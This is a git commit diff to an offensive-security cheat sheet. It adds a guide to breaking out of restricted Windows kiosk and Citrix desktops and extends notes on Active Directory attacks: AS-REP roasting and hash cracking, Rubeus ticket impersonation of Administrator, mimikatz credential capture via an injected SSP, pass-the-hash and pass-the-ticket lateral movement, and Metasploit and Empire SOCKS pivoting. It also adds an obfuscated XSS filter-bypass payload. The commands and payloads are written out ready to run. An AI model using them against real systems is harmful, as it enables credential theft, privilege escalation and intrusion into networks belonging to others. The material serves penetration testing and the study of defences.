Application Escape and Breakout

2024-09-20 14:32:04 +00:00 · 2020-12-17 08:56:58 +01:00 · 2020-12-17 08:56:58 +01:00 · f7e8f515a5
commit f7e8f515a5
parent 973f091d1b
6 changed files with 171 additions and 10 deletions
--- a/Resources/Active
+++ b/Resources/Active
@ -1126,7 +1126,7 @@ Mitigations:
 If a domain user does not have Kerberos preauthentication enabled, an AS-REP can be successfully requested for the user, and a component of the structure can be cracked offline a la kerberoasting

 Prerequisite:
- Accounts have to have **DONT_REQ_PREAUTH**
+- Accounts have to have **DONT_REQ_PREAUTH** (`PowerView > Get-DomainUser -PreauthNotRequired -Properties distinguishedname -Verbose`)

 ```powershell
 C:\>git clone https://github.com/GhostPack/Rubeus#asreproast
@ -1178,6 +1178,7 @@ root@kali:impacket-examples$ python GetNPUsers.py jurassic.park/triceratops:Sh4r

 # crack AS_REP messages
 root@kali:impacket-examples$ hashcat -m 18200 --force -a 0 hashes.asreproast passwords_kerb.txt 
+root@windows:hashcat$ hashcat64.exe -m 18200 '<AS_REP-hash>' -a 0 c:\wordlists\rockyou.txt
 ```

 Mitigations: 
@ -1806,9 +1807,9 @@ Resource-based Constrained Delegation was introduced in Windows Server 2012.
 5. Use Rubeus to get hash from password

    ```powershell
-    Rubeus.exe hash /password:'Weakest123*' /user:swktest  /domain:factory.lan
+    Rubeus.exe hash /password:'Weakest123*' /user:swktest$  /domain:factory.lan
    [*] Input password             : Weakest123*
-    [*] Input username             : swktest
+    [*] Input username             : swktest$
    [*] Input domain               : factory.lan
    [*] Salt                       : FACTORY.LANswktest
    [*]       rc4_hmac             : F8E064CA98539B735600714A1F1907DD
@ -1821,6 +1822,7 @@ Resource-based Constrained Delegation was introduced in Windows Server 2012.

    ```powershell
    .\Rubeus.exe s4u /user:swktest$ /rc4:F8E064CA98539B735600714A1F1907DD /impersonateuser:Administrator /msdsspn:cifs/dc01-ww2.factory.lan /ptt /altservice:cifs,http,host,rpcss,wsman,ldap
+    .\Rubeus.exe s4u /user:swktest$ /aes256:0129D24B2793DD66BAF3E979500D8B313444B4D3004DE676FA6AFEAC1AC5C347 /impersonateuser:Administrator /msdsspn:cifs/dc01-ww2.factory.lan /ptt /altservice:cifs,http,host,rpcss,wsman,ldap

    [*] Impersonating user 'Administrator' to target SPN 'cifs/dc01-ww2.factory.lan'
    [*] Using domain controller: DC01-WW2.factory.lan (172.16.42.5)
--- a/Resources/Escape
+++ b/Resources/Escape
@ -0,0 +1,111 @@
+# Application Escape and Breakout
+
+## Summary
+
+* [Gaining a command shell](#gaining-a-command-shell)
+* [Sticky Keys](#explorer---sticky-keys)
+* [Dialog Boxes](#dialog-boxes)
+    * [Creating new files](#creating-new-files)
+    * [Open a new Windows Explorer instance](#open-a-new-windows-explorer-instance)
+    * [Exploring Context Menus](#exploring-context-menus)
+    * [Save as](#save-as)
+    * [Input Boxes](#input-boxes)
+    * [Bypass file restrictions](#bypass-file-restrictions)
+* [Internet Explorer](#internet-explorer)
+* [Shell URI Handlers](#shell-uri-handlers)
+* [References](#references)
+
+## Gaining a command shell
+
+* **Shortcut**
+    * [Window] + [R] -> cmd 
+    * [CTRL] + [ALT] + [SHIFT] -> Task Manager
+* **Access through file browser**: Browsing to the folder containing the binary (i.e. `C:\windows\system32\`), we can simply right click and `open` it
+* **Drag-and-drop**: dragging and dropping any file onto the cmd.exe 
+* **Hyperlink**: `file:///c:/Windows/System32/cmd.exe`
+* **Task Manager**: `File` > `New Task (Run...)`
+* **MSPAINT.exe**
+    * Open MSPaint.exe and set the canvas size to: Width=6 and Height=1 pixels
+    * Zoom in to make the following tasks easier
+    * Using the colour picker, set pixels values to (from left to right):
+        * 1st: R: 10, G: 0, B: 0
+        * 2nd: R: 13, G: 10, B: 13
+        * 3rd: R: 100, G: 109, B: 99
+        * 4th: R: 120, G: 101, B: 46
+        * 5th: R: 0, G: 0, B: 101
+        * 6th: R: 0, G: 0, B: 0
+    * Save it as 24-bit Bitmap (*.bmp;*.dib)
+    * Change its extension from bmp to bat and run 
+
+
+## Sticky Keys
+
+* Spawn the sticky keys dialog
+    * Via Shell URI : `shell:::{20D04FE0-3AEA-1069-A2D8-08002B30309D}`
+    * Hit 5 times [SHIFT]
+* Visit "Ease of Access Center"
+* You land on "Setup Sticky Keys", move up a level on "Ease of Access Center"
+* Start the OSK (On-Screen-Keyboard)
+* You can now use the keyboard shortcut (CTRL+N)
+
+## Dialog Boxes
+
+### Creating new files
+
+* Batch files – Right click > New > Text File > rename to .BAT (or .CMD) > edit > open
+* Shortcuts – Right click > New > Shortcut > `%WINDIR%\system32`
+
+## Open a new Windows Explorer instance
+
+* Right click any folder > select `Open in new window`
+
+## Exploring Context Menus
+
+* Right click any file/folder and explore context menus
+* Clicking `Properties`, especially on shortcuts, can yield further access via `Open File Location`
+
+### Save as
+
+* "Save as" / "Open as" option
+* "Print" feature – selecting "print to file" option (XPS/PDF/etc)
+* `\\127.0.0.1\c$\Windows\System32\` and execute `cmd.exe`
+
+### Input Boxes
+
+Many input boxes accept file paths; try all inputs with UNC paths such as `//attacker–pc/` or `//127.0.0.1/c$` or `C:\`
+
+
+### Bypass file restrictions
+
+Enter *.* or *.exe or similar in `File name` box
+
+## Internet Explorer
+
+### Download and Run/Open
+
+* Text files -> opened by Notepad
+
+### Menus
+
+* The address bar
+* Search menus
+* Help menus
+* Print menus
+* All other menus that provide dialog boxes
+
+## Shell URI Handlers
+
+* shell:DocumentsLibrary
+* shell:Librariesshell:UserProfiles
+* shell:Personal
+* shell:SearchHomeFolder
+* shell:System shell:NetworkPlacesFolder
+* shell:SendTo
+* shell:Common Administrative Tools
+* shell:MyComputerFolder
+* shell:InternetFolder
+
+## References
+
+* [PentestPartners - Breaking out of Citrix and other restricted desktop environments](https://www.pentestpartners.com/security-blog/breaking-out-of-citrix-and-other-restricted-desktop-environments/)
+* [Breaking Out! of Applications Deployed via Terminal Services, Citrix, and Kiosks - Scott Sutherland - May 22nd, 2013](https://blog.netspi.com/breaking-out-of-applications-deployed-via-terminal-services-citrix-and-kiosks/)
--- a/Resources/Network
+++ b/Resources/Network
@ -138,7 +138,12 @@ or

 # Use Meterpreters autoroute script to add the route for specified subnet 192.168.15.0
 run autoroute -s 192.168.15.0/24 
-use auxiliary/server/socks4a
+use auxiliary/server/socks_proxy
+set SRVPORT 9090
+set VERSION 4a
+# or
+use auxiliary/server/socks4a     # (deprecated)
+

 # Meterpreter list all active routes
 run autoroute -p 
@ -152,6 +157,15 @@ route delete 192.168.14.0 255.255.255.0 3
 route flush 
 ```

+## Empire
+
+```powershell
+(Empire) > socksproxyserver
+(Empire) > use module management/invoke_socksproxy
+(Empire) > set remoteHost 10.10.10.10
+(Empire) > run
+```
+
 ## sshuttle

 Transparent proxy server that works as a poor man's VPN. Forwards over ssh. 
--- a/Resources/Windows
+++ b/Resources/Windows
@ -79,13 +79,13 @@ reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLo
  mimikatz # sekurlsa::logonpasswords
  ```

- LSA is running as virtualized process (LSAISO) by Credential Guard
+- LSA is running as virtualized process (LSAISO) by **Credential Guard**
  ```powershell
  # Check if a process called lsaiso.exe exists on the running processes
  tasklist |findstr lsaiso

-  # If it does there isn't a way tou dump lsass, we will only get encrypted data. But we can still use keyloggers or clipboard dumpers to capture data.
-  #Lets inject our own malicious Security Support Provider into memory, for this example i'll use the one mimikatz provides
+  # Lets inject our own malicious Security Support Provider into memory
+  # require mimilib.dll in the same folder
  mimikatz # misc::memssp

  # Now every user session and authentication into this machine will get logged and plaintext credentials will get captured and dumped into c:\windows\system32\mimilsa.log
--- a/Resources/Windows
+++ b/Resources/Windows
@ -7,8 +7,8 @@
    * [TIP 2 - Retail Credential](#tip-2-retail-credential)
    * [TIP 3 - Sandbox Credential - WDAGUtilityAccount](#tip-3-sandbox-credrential-wdagutilityaccount)
 * [Metasploit](#metasploit)
-    * [Metasploit - SMB](#metasploit-smb)
-    * [Metasploit - Psexec](#metasploit-psexec)
+    * [Metasploit - SMB](#metasploit---smb)
+    * [Metasploit - Psexec](#metasploit---psexec)
 * [Remote Code Execution with PS Credentials](#remote-code-execution-with-ps-credentials)
 * [WinRM](#winrm)
 * [Powershell Remoting](#powershell-remoting)
@ -20,6 +20,8 @@
 * [RDP Remote Desktop Protocol](#rdp-remote-desktop-protocol)
 * [Netuse](#netuse)
 * [Runas](#runas)
+* [Pass the Ticket](#pass-the-ticket)
+* [SSH](#ssh)

 ## TIPS

@ -87,6 +89,7 @@ use exploit/windows/smb/psexec
 set RHOST 10.2.0.3
 set SMBUser username
 set SMBPass password
+set SMBPass e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c
 set PAYLOAD windows/meterpreter/bind_tcp
 run
 shell
@ -123,6 +126,7 @@ Require:
 root@payload$ git clone https://github.com/Hackplayers/evil-winrm
 root@payload$ evil-winrm -i IP -u USER [-s SCRIPTS_PATH] [-e EXES_PATH] [-P PORT] [-p PASS] [-H HASH] [-U URL] [-S] [-c PUBLIC_KEY_PATH ] [-k PRIVATE_KEY_PATH ] [-r REALM]
 root@payload$ evil-winrm.rb -i 192.168.1.100 -u Administrator -p 'MySuperSecr3tPass123!' -s '/home/foo/ps1_scripts/' -e '/home/foo/exe_files/'
+root@payload$ ruby evil-winrm.rb -i 10.0.0.20 -u user -H BD1C6503987F8FF006296118F359FA79
 ```

 or using a custom ruby code to interact with the WinRM service.
@ -190,7 +194,7 @@ PS C:\> wmic /node:target.domain /user:domain\user /password:password process ca

 ## Psexec.py / Smbexec.py / Wmiexec.py 

-from Impacket
+From [Impacket](https://github.com/SecureAuthCorp/impacket) (:warning: renamed to impacket-xxx in Kali)

 ```powershell
 root@payload$ git clone https://github.com/CoreSecurity/impacket.git
@ -204,6 +208,8 @@ root@payload$ python smbexec.py DOMAIN/username:password@10.10.10.10

 # A semi-interactive shell, used through Windows Management Instrumentation. 
 root@payload$ python wmiexec.py DOMAIN/username:password@10.10.10.10
+root@payload$ wmiexec.py domain.local/user@10.0.0.20 -hashes aad3b435b51404eeaad3b435b51404ee:BD1C6503987F8FF006296118F359FA79
+

 # A semi-interactive shell similar to wmiexec.py, but using different DCOM endpoints. 
 root@payload$ python atexec.py DOMAIN/username:password@10.10.10.10
@ -289,6 +295,24 @@ PS C:\> runas /netonly /user:DOMAIN\username "cmd.exe"
 PS C:\> runas /noprofil /netonly /user:DOMAIN\username cmd.exe
 ```

+## Pass the Ticket
+
+```powershell
+python3 getTGT.py -hashes aad3b435b51404eeaad3b435b51404ee:B65039D1C0359FA797F88FF06296118F domain.local/user
+[*] Saving ticket in user.ccache
+cp user.ccache /tmp/krb5cc_0
+export KRB5CCNAME=/tmp/krb5cc_0
+klist
+```
+
+## SSH
+
+:warning: You cannot pass the hash to SSH, but you can connect with a Kerberos ticket (Which you can get by passing the hash!
+
+```ps1
+cp user.ccache /tmp/krb5cc_1045
+ssh -o GSSAPIAuthentication=yes user@domain.local -vv
+```

 ## References

--- a/Injection/README.md
+++ b/Injection/README.md
@ -49,6 +49,7 @@ Cross-site scripting (XSS) is a type of computer security vulnerability typicall
  - [Bypass ";" using another character](#bypass-using------using-another-character)
  - [Bypass using HTML encoding](#bypass-using-html-encoding)
  - [Bypass using Katana](#bypass-using-katana)
+  - [Bypass using Cuneiform](#bypass-using-cuneiform)
  - [Bypass using Lontara](#bypass-using-lontara)
  - [Bypass using ECMAScript6](#bypass-using-ecmascript6)
  - [Bypass using Octal encoding](#bypass-using-octal-encoding)
@ -834,6 +835,15 @@ Using the [Katakana](https://github.com/aemkei/katakana.js) library.
 javascript:([,ウ,,,,ア]=[]+{},[ネ,ホ,ヌ,セ,,ミ,ハ,ヘ,,,ナ]=[!!ウ]+!ウ+ウ.ウ)[ツ=ア+ウ+ナ+ヘ+ネ+ホ+ヌ+ア+ネ+ウ+ホ][ツ](ミ+ハ+セ+ホ+ネ+'(-~ウ)')()
 ```

+### Bypass using Cuneiform
+
+```javascript
+𒀀='',𒉺=!𒀀+𒀀,𒀃=!𒉺+𒀀,𒇺=𒀀+{},𒌐=𒉺[𒀀++],
+𒀟=𒉺[𒈫=𒀀],𒀆=++𒈫+𒀀,𒁹=𒇺[𒈫+𒀆],𒉺[𒁹+=𒇺[𒀀]
+(𒉺.𒀃+𒇺)[𒀀]+𒀃[𒀆]+𒌐+𒀟+𒉺[𒈫]+𒁹+𒌐+𒇺[𒀀]
+𒀟][𒁹](𒀃[𒀀]+𒀃[𒈫]+𒉺[𒀆]+𒀟+𒌐+"(𒀀)")()
+```
+
 ### Bypass using Lontara

 ```javascript